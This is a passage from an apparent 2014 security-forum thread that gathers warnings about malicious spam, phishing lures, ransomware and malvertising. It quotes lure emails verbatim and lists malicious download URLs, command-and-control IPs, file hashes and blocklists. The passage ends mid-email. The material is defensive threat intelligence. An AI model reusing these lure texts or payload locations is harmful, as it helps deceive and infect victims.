This morning at 1:10 A.M. in the neighborhood La Macarena, Colombia. The well-known singer and performer Shakira Isabel Mebarak Ripoll, suffered a serious car accident in which she lost herlife. Aboard the vehicle was her manager, who was seriously injured. Witnesses say the car driven by the latter, was speeding ..
To view exclusive images and details of the story, we have attached a document with all the information about this tragic event.

When attempting to open the Word document (IMAGENES_01.doc), the potential victim sees the following:
Screenshot: https://4.bp.blogspot.com/-Fl3B4-2DtGs/VAnGpyytNwI/AAAAAAAAFjw/tAwTQGZ3IR8/s1600/shakira.png

The rest of the document explains to the victim how to remove the security settings from Word, supposedly to enable them to view the pictures. But what will actually happen is that the malicious macro in the document will try to infect the PC. This malicious document has a VirusTotal detection rate of just 2/54*. According to an analysis of the document, it then appears to download additional components from an insecure Joomla site at [donotclick]www .papeleriaelcid .com/aurora/ajax/ ... In this case the originating IP was 207.150.195.247 (a SouthWeb Ventures IP allocated to a customer supposedly called "Microinformatica Gerencial, S.A. de C.V."). Blocking the papeleriaelcid .com site and rejecting emails from 207.150.195.247 might be wise ..."
(English or other languages may be spammed out next.)
* https://www.virustotal.com/en-gb/file/564d1beb56c8738d7d1c00f1e863abe0b0cbc1878c26d9c688df0b61da25875b/analysis/1409926479/
___

NatWest Phish: “You are Logging In from Different Cities”
- https://blog.malwarebytes.org/fraud-scam/2014/09/natwest-phish-you-are-logging-in-from-different-cities/
Sep 5, 2014 - "There’s a NatWest phish in circulation which tries to scare recipients with warnings of logins from multiple cities which it claims is forbidden. Anybody spending a lot of time on the road for work or personal reasons could potentially be panicked into clicking the links in this one. The URL in the mail leads to a 404 error on a website about different types of paint, so it’s likely been reported and / or pulled by the hosts but here’s the text so you can easily spot it the next time it gets rolled out with a fresh URL:

Dear Customer,
During a recent review of your account we found that you are currently logging in from different cities in a suspicious manner that is not compliant with our bank policies.
NatWest customers are not permitted to log in from different places at same time, or using proxies.
For your safety, we have temporarily deactivated your account, to reactive your account please go to our SSL secure link below and update your account credentials.
However, please note that our squad reserves the right to close your account at any time. As such, we encourage you to become familiar with our program policies and monitor your network accordingly.

The email displays the full URL in the text of the legitimate NatWest website, but uses the old trick of making the clickable link take them to a -phish- hosted on a -compromised- website... it’s always a good idea to hover over any clickable link in an email so you can check the final destination... with so many people traveling as part of their job nowadays this could easily snag a few victims."
___

Cryptographic Locker
- http://www.webroot.com/blog/2014/09/05/cryptographic-locker/
Sep 5, 2014 - "... every few weeks we see a -new- encrypting ransomware variant. It’s not surprising either since the business model of ransoming files for money is tried and true. Whether it’s important work documents, treasured wedding pictures, or complete discographies of your favorite artists, everyone has valuable data they don’t want taken. This is the last thing anyone wants to see:
> https://www.webroot.com/blog/wp-content/uploads/2014/09/background-cropped.png
This variant does bring some new features to the scene, but also fails at other lessons learnt by previous variants. Starting with the new features this variant will now just “delete” the files after encrypting them (it just hides them from you). This doesn’t add any more intangibility since they are encrypted with AES-128 anyway, but it does add a greater sense of loss and panic since all of your common data directories will appear to have been cleaned out. Another new feature is the constant raise in price every 24 hours. While price bumping was used on previous variants, this one doesn’t have a limit... this variant falls short on overall volatility is in the failure to delete the VSS (Volume Shadow Service) so using tools like Shadow Explorer* will work to retrieve your files and circumvent paying the ransom. As I’ve said in previous blogs I do expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution..."
* http://www.shadowexplorer.com/

:fear: :mad:

AplusWebMaster
2014-09-08, 13:20
FYI...

Fake BH Live Tickets SPAM - (bhlive .co.uk / bhlivetickets .co.uk)
- http://blog.dynamoo.com/2014/09/bh-live-tickets-peter-pan-spam.html
8 Sep 2014 - "... very large quantity of these spam emails, purporting to be from:
From: bhlivetickets@ bhlive .co.uk
Date: 8 September 2014 08:43
Subject: Confirmation of Order Number 484914
ORDER CONFIRMATION
Order Number Order Date
484914 07-09-2014 13:00
YOUR E-TICKET(S) ARE ATTACHED TO THIS EMAIL, SENT TO [redacted]. Please print ALL PAGES of the PDF file attached to the email and bring them with you to gain admission to the event...

These emails are -not- from BH Live Tickets and their systems have not been compromised in any way. Instead, these emails are a forgery with an attachment (tickets.3130599.zip or similar) which in turn contains a malicious executable (in this case tickets.332091.exe). The VirusTotal detection rate for this malware is just 3/55*. Comodo CAMAS reports** that this downloads an additional component from tiptrans .com .tr/333 which has a VirusTotal detection rate of 4/51***. According to ThreatExpert****, this second component POSTs some information to 80.94.160.129:8080 (OVH, France) and also appears to contact 92.222.46.165 (National Academy Of Sciences Of Belarus).
Recommended blocklist:
tiptrans .com .tr
92.222.46.165
80.94.160.129"
* https://www.virustotal.com/en-gb/file/7a3a9360cd4dae87981e9e56a988e149223266512ebd468f7c59aacda2c1bfe3/analysis/1410162673/

** http://camas.comodo.com/cgi-bin/submit?file=7a3a9360cd4dae87981e9e56a988e149223266512ebd468f7c59aacda2c1bfe3

*** https://www.virustotal.com/en-gb/file/41de66fb7dc00dd5fe19e2fa6247af3b30b2ed3a80eadc1cc4410ea8b227ef47/analysis/1410163490/

**** http://www.threatexpert.com/report.aspx?md5=992acfe50852f1287394a991645aec4b

- http://myonlinesecurity.co.uk/confirmation-order-number-fake-pdf-malware/
8 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/bhlive_ticketsd.png

> https://www.virustotal.com/en-gb/file/72caf25189d16d81915d78c494cf5b7c93f45b254cb25e31526f7b5b546a9e83/analysis/1410164460/
___

Fake RBS "Important Docs" SPAM - again ...
- http://blog.dynamoo.com/2014/09/rbs-importat-docs-spam.html
8 Sep 2014 - "The Royal Bank of Scotland has been spoofed several times recently, this latest fake spam contains a payload that looks like it might be Cryptowall.
Date: Mon, 8 Sep 2014 15:00:22 +0100 [10:00:22 EDT]
From: Vicente Mcneill [Vicente@rbs .co.uk]
Subject: Important Docs
Please review attached documents regarding your account.
Tel: 01322 929655
Fax: 01322 499190
email: Vicente@ rbs .co.uk ...

Attached is an archive RBS_Account_Documents.zip containing a malicious executable RBS_Account_Documents.scr which has a detection rate at VirusTotal of 4/53*... analysis shows that it attempts to download components from the following locations:
95.141.37.158/0809uk1/NODE01/0/51-SP3/0/
95.141.37.158/0809uk1/NODE01/1/0/0/
95.141.37.158/0809uk1/NODE01/41/5/4/
bullethood.com/ProfilePics/0809uk1.zip
95.141.37.158 is SeFlow.it Internet Services, Italy. bullethood .com is on a shared server at GoDaddy. The malware also appears to be attempting to connect to 94.23.250.88 (OVH, France).
Recommended blocklist:
bullethood .com
95.141.37.158
94.23.250.88"
* https://www.virustotal.com/en-gb/file/f9046c5fbdddee04dd8fbf6e187a630b88a961243b20933afcb0e36091847d59/analysis/1410183105/
___

Cryptowall ransomware ...
- http://arstechnica.com/security/2014/09/ransomware-going-strong-despite-takedown-of-gameover-zeus/
Sept 7 2014 - "... Within a week of the takedown of Gameover Zeus and Cryptolocker, a surge of spam with links to a Cryptolocker copycat, known as Cryptowall, resulted in a jump in ransomware infections, states a report released last week by security-services firm Dell Secureworks*. Cryptowall first appeared in November 2013, and spread slowly, but the group behind the program were ready to take advantage of the vacuum left by the downfall of its predecessor. Being prepared paid off: In six months, the Cryptowall group infected nearly 625,000 systems, and even though only 0.27% of victims paid, the group still made $1.1 million, according to data from a command-and-control server discovered by Dell Secureworks..."
* http://www.secureworks.com/cyber-threat-intelligence/threats/cryptowall-ransomware/
___

‘Dyre’ malware goes after Salesforce users
- https://blog.malwarebytes.org/cyber-crime/2014/09/dyre-malware-goes-after-salesforce-users/
Sep 8, 2014 - "San Francisco-based company Salesforce well-known for its cloud-based Customer Relationship Management (CRM) software, emailed a security advisory to its customers, late Friday.
Copy of the email sent by Salesforce:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/salesforce_email.png
The threat known as Dyre was originally spotted by security firm CSIS* and by PhishMe** which also had uncovered the new malware earlier in June. Back then, the threat was aimed at banks and other financial institutions, something very reminiscent of other banking Trojans such as Zeus and its variants. But researchers discovered that the malware is now capable of capturing login credentials from Salesforce users by -redirecting- them through a phishing website. Dyre will initially infect users through some form of social-engineering, typically with an email that contains a malicious attachment. Once on the system, the malware can act as a man-in-the-middle and intercept every single keystroke. To be clear, this is not a vulnerability with Salesforce or its website, but rather a type of malware that leverages compromised end-point machines... This type of attack could be mean there might be a new trend on the horizon, one that goes after Software as a Service (SaaS) users. Businesses increasingly rely on third-party software providers for their needs because it can be a cheaper option without all the headaches of doing it yourself. For example, instead of managing their own email server, companies will use Office365 or similar cloud-based email solutions. Banking credentials are still the bread-and-butter for the majority of cyber-crooks because they can be immediately used. But the data harvested from many SaaS applications also holds a tremendous value for those willing to invest the time to dig in and find bits of information that could lead to a large compromise in a top-tier business. There is no silver bullet to defend against these threats but once again a healthy balance of end-user education about phishing scams and proper end-point security solutions will go a long way. Data exfiltration is one the most important issues of 2014 with a growing number of businesses being affected. The effects on companies’ brands and trust of their customers can be very damaging and long lasting, not to mention the potential lawsuits that often follow.:
* https://www.csis.dk/en/csis/news/4262/

** http://phishme.com/project-dyre-new-rat-slurps-bank-credentials-bypasses-ssl/
___

Fake "PAYMENT SLIP" SPAM - with an encrypted .7z archive
- http://blog.dynamoo.com/2014/09/payment-slip-spam-comes-with-encrypted.html
8 Sep 2014 - "This spam comes with a malicious attachment:
From: daniel mo [danielweiche002@ gmail .com]
Subject: PAYMENT SLIP
Signed by: gmail .com
Thanks for your last message,
We remitted 30% prepayment today amounting to 51,300USD against your invoice INV332831 as was agreed with you by our purchasing agent. Please check the attached invoice and the payment slip and correspond your account information. You will receive payment in your account after a few days.
Please confirm the receipt below,
kindly use this password {121212} to view attachment for our payment slip;
Thanks,
Daniel
Accounts Assistant
67752222
64472801
Zenia Singapore Pte Ltd

In order to deal with the attachment new order.7z, you'll need something capable of dealing with .7z files (e.g. 7-Zip). Inside the archive is a malicious executable new order.scr which has a VirusTotal detection rate of 5/54*. I have not been able to analyse the malware any further than this."
* https://www.virustotal.com/en-gb/file/b1277d881f6504e668eabdaaced21f66618b2a0cd25ad94fc1e1b1a31806f363/analysis/1410186462/
___

RBC Royal Bank Phish - and PDF malware
- http://myonlinesecurity.co.uk/received-new-secure-message-rbc-royal-bank-customer-service-phishing/
8 Sep 2014 - "'You have received a new secure message from RBC Royal Bank Customer Service' pretending to come from RBC Royal Bank Customer Service <securemessage@ rbc .com> is an attempt to -scam- you and get your bank log on details. It also is trying to infect you and is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email is particularly devious, evil and crafty as it sends you to a site that at first glance you think is a phishing site (if you are unwise enough to click any of the links in the email). However that site also has a hidden iframe that tries to download some malware to the computer if you have a vulnerable version of Java. Then if that isn’t enough when you fill in the log in details on the page the buttons on the page appear to link to the genuine RBC bank site so hovering over the links will fool you into thinking that you are on the genuine RBC site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/rbc.png
... then the sign in button leads you to this webpage where any of the links or the buttons download what appears to be a genuine PDF file that looks blank. That file is a malformed PDF with a script virus embedded that will infect you. This file 09.08.14report.pdf has a current VirusTotal detection rate of 5/55*. These emails contain a genuine PDF file that is malformed and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader..."
* https://www.virustotal.com/en/file/8c966250202f464973929a31886b6ba8d4454425f9348000833091f9d9e8c59a/analysis/1410199439/

- http://threattrack.tumblr.com/post/96988594103/rbc-royal-bank
Sep 8, 2014 - "Subjects Seen:
You have received a new secure message from RBC Royal Bank Customer Service
Typical e-mail details:
You have received a secure message
This is an automated message sent by Royal Bank Secure Messaging Server.
The link above will only be active until: 09/10/2014
Please click here or follow this link : royalbank.com/cgi-bin/rbaccess/rbcgi3m01
Help is available 24 hours a day by email at secure.emailhelp @rbcroyalbank.com
If you have concerns about the validity of this message, please contact the sender directly. For questions about Royal Bank’s e-mail encryption service, please contact technical support at 1-800-769-2511.
First time users - will need to register before reading the Secure Message.

Malicious URLs:
halilbekrek .com/TUTOS/libs/excel/install6.exe
66.235.98.169/rbc.com/webapp/ukv0/signin/logon.php
66.235.98.169/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf
84.45.53.45/rbc.com/webapp/ukv0/signin/logon.php
84.45.53.45/rbc.com/webapp/ukv0/signin/message.html
84.45.53.45/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf

Malicious File Name and MD5:
install6.exe (e3fbc7b3bf11f09c5ee33b1e1b45f81b)
09.08.14report.pdf (ecddafa699814679552d2bf95fc087e5)
OfigGigg.dat (85d42ccc12301bbda27abf4c0b7eb7ff)

66.235.98.169: https://www.virustotal.com/en/ip-address/66.235.98.169/information/

84.45.53.45: https://www.virustotal.com/en/ip-address/84.45.53.45/information/

Tagged: RBC, Vawtrak, CVE-2013-2729
___

Fake Tcn Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/tcn-invoice-n265588248042e-fake-pdf-malware/
8 Sep 2014 - "'Tcn Invoice # N265588248042E' pretending to come from Katharine Norwood <Katharine.Norwood@ advanced-ornamentation .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Good morning...
I requested an invoice yesterday; on the invoice it shows a charge of $585.15 although on my credit card statement it shows a charge of $185.13. Can you please advise on what the total should be and if it is for the amount of $185.13 can you please provide an invoice with that amount.
Thank you.
Katharine Norwood
Administrative Assistant
San Diego, CA 92135
205 840-2913

8 September 2014: Invoice.zip ( 48 kb) : Extracts to Invoice.pdf.scr
Current Virus total detections: 4/55*. This 'Tcn Invoice # N265588248042E' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/52c344196cf767035c404995bb4237677540b2f17e815c4d5433f7b35ffa4d4d/analysis/1410198304/
___

Twitter Phish SPAM: “Strange Rumors About You”
- https://blog.malwarebytes.org/fraud-scam/2014/09/twitter-phishing-spamrun-strange-rumors-about-you/
Sep 8, 2014 - "... an ongoing Twitter spam attack which is sending potential victims to phishing pages via a Tumblr -redirect- . Compromised Twitter accounts and / or bots are sending variations of the below to Twitter users:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam1.jpg
We’ve seen some 200+ messages sent in the last ten minutes, and this attack has been ongoing for at least six hours. Here’s the Tumblr -spam- blog which is redirecting to the fake Twitter login, and the -fake- login itself:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam2.jpg
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam3.jpg
The -fake- page reads:
“Your current session has ended.
For security purposes your [sic] were forcibly signed out. You need to verify your Twitter account, please relogin.”
Twitter users should -avoid- signing into Twitter via any of the links being sent around, and always check the URL to ensure they’re entering their credentials in the right place."

211.154.136.106: https://www.virustotal.com/en/ip-address/211.154.136.106/information/

:fear: :mad:

AplusWebMaster
2014-09-09, 15:47
FYI...

Fake Bill.com Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/bill-com-invoice-paid-fake-pdf-malware/
9 Sep 2014 - "'Bill.com Invoice has been paid' pretending to come from The Bill .com Team <notificationonly@ hq.bill .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[ Bill .com image ]
Hi,
Thank you for payment to Bill.com. The credit/debit card you have on file with us was successfully charged $115.33 for the billing period 08/01/14-09/01/14.
The Statement for this account is now available for viewing. Please find it attached to this email.
Have questions? Sign in at our website, then contact support.
Thank you,
The Bill .com Team
Please do not respond to this email. This e-mail was sent from a notification-only e-mail address.

9 September 2014: bill-d59f78596bfa79e01898cf9d0e645b99328028d597e9005146787f09435a01016270d6ffc5d69ec27901.zip ( 486 kb):
Extracts to BILL_ID_895634523945258345873645763459879876432985763298563253245.pdf.exe Current Virus total detections: 28/55*. This Bill .com Invoice has been paid is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e3c2b761ce6a188e9669480d52368f3e865499a06813d939c23ad915d49cba62/analysis/1410252379/
____

“Google dorking“ ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/google-dorking-waking-up-web-admins-everywhere/
Sep 9, 2014 - "Last July, the US Department of Homeland Security warned of a new kind of criminal attack: “Google dorking“*. This refers to asking Google for things they have found via special search operators... Google finds things online using a program that accesses web sites: the Google web crawler, called the Googlebot. When the Googlebot examines the web and finds “secret” data, it adds it to Google’s database just like any other kind of information... suppose your company’s HR representative left a spreadsheet with -confidential- employee data -online- . Since it’s open for everyone to access, the crawler sees and indexes it. From them on, even though it might have been hard to find before, a simple – or not so simple – Google search will point any attacker to it. Google never stored the actual data (unless it was cached), it just made it easier to find. This kind of “attack” has been around for as long as search engines have been around. There are whole books devoted to the subject of “Google dorking”, which is more commonly known as “Google hacking”. Books have been published about it for years, and even the NSA has a 643-page manual that describes in detail how to use Google’s search operators to find information. The warning – as ridiculous as it might seem – has some merit... finding information that has been carelessly left out in the open is not strictly criminal: at the end of the day, it was out there for Googlebot to find. Google can’t be blamed for finding what has been left public; it’s the job of web admins to know what is and isn’t on their servers wide open for the world to see. It’s not just confidential documents that are open to the public, either. As we noted as far back in 2013, industrial control systems could be found via Google searches. Even more worryingly, embedded web servers (such as those used in web cameras) are found online all the time with the Shodan search engine. This latter threat was first documented in 2011, which means that IT administrators have had three years to shut down these servers, but it’s still a problem to this day. In short: this problem has been around for a while, but given that it’s still around an official warning from the DHS is a useful reminder to web admins everywhere: perform “Google dorking” against your own servers frequently, looking for things that shouldn’t be there. If you don’t, somebody else will and their intentions might not be so pure..."
* https://publicintelligence.net/feds-google-dorking/
___

Fake Sage Outdated Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/sage-outdated-invoice-fake-pdf-malware/
9 Sep 2014 - "'Outdated Invoice' pretending to come from Sage Account & Payroll <invoice@ sage .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[Sage logo image ]
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:
... Account?432532=Invoice_090914.zip
If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@sage.com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.
The contents of this email and any attachments are confidential...

9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55* . This 'Outdated Invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e7b04220bc9c21161ba5f6aac8cd7bc2c7951aa80fc68b2d196cb9da7a78dc8d/analysis/1410267601/

- http://blog.dynamoo.com/2014/09/sage-outdated-invoice-spam.html
9 Sep 2014
"Recommended blocklist:
95.141.37.158 ..."
(More detail at the dynamoo URL above.)

95.141.37.158: https://www.virustotal.com/en/ip-address/95.141.37.158/information/
___

Fake NatWest Invoice SPAM - PDF malware
- http://myonlinesecurity.co.uk/important-new-account-invoice-fake-pdf-malware/
9 Sep 2014 - "'Important – New account invoice' pretending to come from NatWest Invoice <invoice@ natwest .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[NatWest logo image]
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below...

9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55* . This 'Important – New account invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e7b04220bc9c21161ba5f6aac8cd7bc2c7951aa80fc68b2d196cb9da7a78dc8d/analysis/1410267601/
___

Fake Worker’s Compensation SPAM – word.doc malware
- http://myonlinesecurity.co.uk/hmcts-workers-compensation-appeal-fake-word-doc-malware/
9 Sep 2014 - "'HMC&TS Worker’s Compensation Appeal' pretending to come from HM Courts and Tribunals Service <submit.wjq@ courtsni .gov.uk>is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... So far today I have seen several subjects for this email:
HMC&TS Worker’s Compensation Appeal
Worker’s Compensation Summons
HM Courts & Tribunals Service Summons
HM Courts & Tribunals Service
All the emails are very similar, but will have different courts or tribunals listed and different dates, case numbers and tribunal members. The faked sender will always be the same name as the recipient of the email with a few random letters after the name... Email reads:
Worker’s Compensation Appeal Tribunal
Decision # 502
Board Direction To Rehear Decision #695
Claim No.: 2504=5704
Date of Original Notice of Appeal: June 10, 2014
Date Received at The Tribunal: June 19, 2014
Date of Board Direction to Rehear: August 11, 2014
Received: August 20, 2014
Date of Documentary Review by Appeal Committee: August 23, 2014
Date of Decision: September 6, 2014
To Whom It May Concern,
Your Corporation (named Respondent)
Appears to be in default because of its failure to comply with the Administrative Law Judge’s Prehearing Order without decent cause, and such default by Respondent constitutes an admission of all facts alleged in the Complaint and a waiver of Respondent’s right to contest such factual allegations. Respondent violated the section 9(6), paragraph B13(1) of the Jobseekers Act 1995.
We recommend you to download a copy of original Complaint at Tribunal in attachment below...

9 September 2014: Copy68789.zip (66kb): Extracts to Copy of original Complaint at Tribunal.docx.exe
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word .doc instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c765b5ba935a3c872388185940ca89570a1710e89148ce25caf1a54148079800/analysis/1410269102/

- http://threattrack.tumblr.com/post/97055148048/hm-courts-tribunals-service-spam
Sep 9, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4cb469a9e44e608eacef08eba6109111/tumblr_inline_nbmytoLcAX1r6pupn.png

Malicious File Name and MD5:
Copy4855.zip (854ADF297E8B1D79BA0E744F90AFDE50)
Copy of original Complaint at Tribunal.docx.exe (6D9BDE90B81C064ACA5ED994BC8A981A)

Tagged: HM Courts & Tribunals, Kuluoz
___

Hacks throw 25 malware variants at Apple Mac OS X
- http://www.theinquirer.net/inquirer/news/2363995/hackers-throw-25-malware-variants-at-apple-mac-os-x
Sep 9 2014 - "... 25 varieties of malware, some of which are being used in targeted attacks, warns security firm F-Secure. F-Secure reported uncovering the malware variants in its Threat Report H1 2014*, claiming it discovered the first 20 attack tools earlier this year..."
* http://www.f-secure.com/weblog/archives/00002741.html
Sep 8, 2014

:mad: :fear:

AplusWebMaster
2014-09-10, 14:17
FYI...

Fake DHL invoice SPAM
- http://blog.dynamoo.com/2014/09/geir-myklebust-dhl-no.html
10 Sep 2014 - "Geir Myklebust is a real employee for DHL in Norway, but neither he nor DHL are responsible for this spam run in any way (their systems have NOT been breached either). Instead, it contains a malicious attachment and it should simply be deleted.
From: Geir Myklebust (DHL NO) [Geir.Myklebust@ dhl .com]
Date: 10 September 2014 10:35
Subject: FW: customer acct. no.: 4690086 - invoice 0257241 needs to be paid
Dear Sir.
The attached invoice from Villmarksmessen 2014 has still not been settled.
Please advise as soon as possible.
Thank you and regards,
Geir
Med vennlig hilsen/ Kind Regards
Geir Myklebust
Product Manager, Avd. Trade Fairs & Events
DHL Global Forwarding (Norway) AS
Avd. Trade Fairs & Events
Messeveien 14
2004 Lillestrøm ...

Attached is a ZIP file of various different names (e.g. invoice_0257241.zip), containing a malicious executable file invoice_3466198.exe which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report** shows an attempted connection to voladora .com/Imagenes/qaws.cab which is currently coming up with a socket error. I would recommend that you block access to that domain. Further analysis is pending..."
* https://www.virustotal.com/en-gb/file/779955dd6a5da605f2432449bf1edc35e356a251cf43f3cbfda704a26cac5038/analysis/1410342283/

** http://camas.comodo.com/cgi-bin/submit?file=779955dd6a5da605f2432449bf1edc35e356a251cf43f3cbfda704a26cac5038

"UPDATE: a second malicious binary is doing the round, this time with a detection rate of 2/53***..."
*** https://www.virustotal.com/en-gb/file/febd053fdafbc097eedbacac3e0f97d912f7925ddab0dfc90a32895dac35fbdd/analysis/1410353017/

92.43.17.6: https://www.virustotal.com/en/ip-address/92.43.17.6/information/

- http://myonlinesecurity.co.uk/fw-customer-acct-186588-invoice-9782264-needs-paid-fake-pdf-malware/
10 Sep 2014
- https://www.virustotal.com/en/file/febd053fdafbc097eedbacac3e0f97d912f7925ddab0dfc90a32895dac35fbdd/analysis/1410350810/
___

Fake Overdue invoice SPAM – doc malware
- http://myonlinesecurity.co.uk/overdue-invoice-1197419584-fake-doc-malware/
10 Sep 2014 - "'Overdue invoice #1197419584' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good afternoon,
I was hoping to hear from you by now. May I have payment on invoice #1197419584 today please, or would you like a further extension?
Best regards,
Cherish Schaunaman
+07540 61 15 69
... or like this one:
This email contains an invoice file in attachment.

10 September 2014 : bill_2014-09-10_09-16-23_1197419584.arj :
Extracts to: bill_2014-09-10_09-16-23_1197419584.exe
Current Virus total detections: 6/55*
Alternative version 10 September 2014 : Invoice4777_2C7.zip :
Extracts to: attachment_scaned.doc .exe
Current Virus total detections: 2/54**
This 'Overdue invoice #1197419584' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word.doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c6d8f5ad6ff6f35be8b2fe921fc65619ba5708b5a0597a6929fd3bc3f36aabb/analysis/1410342531/

** https://www.virustotal.com/en/file/877eab31951bb48139f0ec592ce906ff3891a74f078af494eeb8ccbc9d913b52/analysis/1410341816/
___

'Outstanding Warrant' Phone SCAMS
- http://www.hoax-slayer.com/outstanding-warrant-phone-scams.shtml
Sep 10, 2014 - "Scammers posing as law-enforcement officers are cold-calling people and tricking them into paying over the phone to resolve supposedly outstanding warrants. The scammers warn victims that, if they don't pay the requested fee, police may come to their home and arrest them... The scammers are reportedly quite skilled at impersonating police officers and are often able to convince victims that they are legitimate. When victims call back on the number provided, the scammers may identify their 'office' as a seemingly legitimate entity such as the 'County Warrants Department'. This simple -ruse- may further convince victims that the scammer's claims are true... This type of -scam- is certainly nothing new and has been around in various forms for many years... a flurry of reports from several US states suggests that these scammers are currently quite active. The scammers are also using variations of the old jury duty phone scam to steal money from victims. Police will -never- call you and demand an immediate payment to resolve an outstanding warrant. If you receive such a suspect call, do -not- give the caller any personal and financial information and do -not- comply with their instructions. If in doubt, call your local police to check. Do -not- use a phone number provided by the caller. Find a number for police in a local phone directory..."
___

Malvertisements - YouTube, Amazon and Yahoo
- http://www.computerworld.com/article/2604303/malicious-advertising-hits-amazon-youtube-and-yahoo.html
Sep 9, 2014 - "Malicious advertisements have popped up on websites such as YouTube, Amazon and Yahoo, part of a sophisticated campaign to spread malware, Cisco said*... When encountered, the malicious advertisements cause the user to be -redirected- to a different website, which triggers a download based on whether the computer is running Windows or Apple's OS X... Cisco didn't identify the advertising network that is serving the malicious advertisements. Although ad networks try to filter out malicious ones, occasionally bad ones slip in, which for a high-traffic site means a large pool of potential victims... Some of the malicious ads were served on youtube.com, amazon.com and ads.yahoo.com, Pelkmann wrote. All told, 74 domains were serving the ads. When a victim is -redirected- by one of the ads, the computer downloads a piece of malware with a unique checksum, making it harder for security software to detect. The download may also contain legitimate software such as a media player. To be infected, the user must be convinced to open the file. 'The attackers are purely relying on social engineering techniques in order to get the user to install the software package,' Pelkmann wrote. 'No drive-by exploits are being used thus far'..."
* http://blogs.cisco.com/security/kyle-and-stan/

:fear: :mad:

AplusWebMaster
2014-09-11, 14:55
FYI...

Fake job offer SPAM - llcinc .net
- http://blog.dynamoo.com/2014/09/llc-inc-llcincnet-fake-job-offer.html
11 Sep 2014 - "This -fake- company's name looks like it has been designed to be hard to find on Google. The so-called LLC INC using the domain llcinc .net does -not- exist.
Date: Wed, 10 Sep 2014 19:51:50 -0400 [09/10/14 19:51:50 EDT]
From: LLC INC
Reply-To: recruiter@ llcinc .net
Subject: EMPLOYMENT OFFER
Hello,
Good day to you overthere we will like to inform you that our company is currently
opening an opportunity for employment if you are interested please do reply with your resume
to recruiter@ llcinc .net
Thanks
Management LLC INC

This so-called job is going to be something like a money mule, parcel mule or some other illegal activity. The domain llcinc .net was registered just a few days ago with -fake- details... There is no website. The email originates from 209.169.222.37, the mail headers indicate that this is probably a compromised email server mail .swsymphony .org.
Avoid."
___

Fake eFax SPAM leads to Cryptowall
- http://blog.dynamoo.com/2014/09/efax-spam-leads-to-cryptowall.html
11 Sep 2014 - "Yet another -fake- eFax spam. I mean really I cannot remember the last time someone sent me a (real) fax...
From: eFax [message@ inbound .efax .com]
Date: 11 September 2014 20:35
Subject: eFax message from "unknown" - 1 page(s), Caller-ID: 1-865-537-8935
Fax Message [Caller-ID: 1-865-537-8935
You have received a 1 page fax at Fri, 12 Sep 2014 02:35:44 +0700.
* The reference number for this fax is atl_did1-1400166434-52051792384-154.
Click here to view this fax using your PDF reader.
Please visit www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service! ...

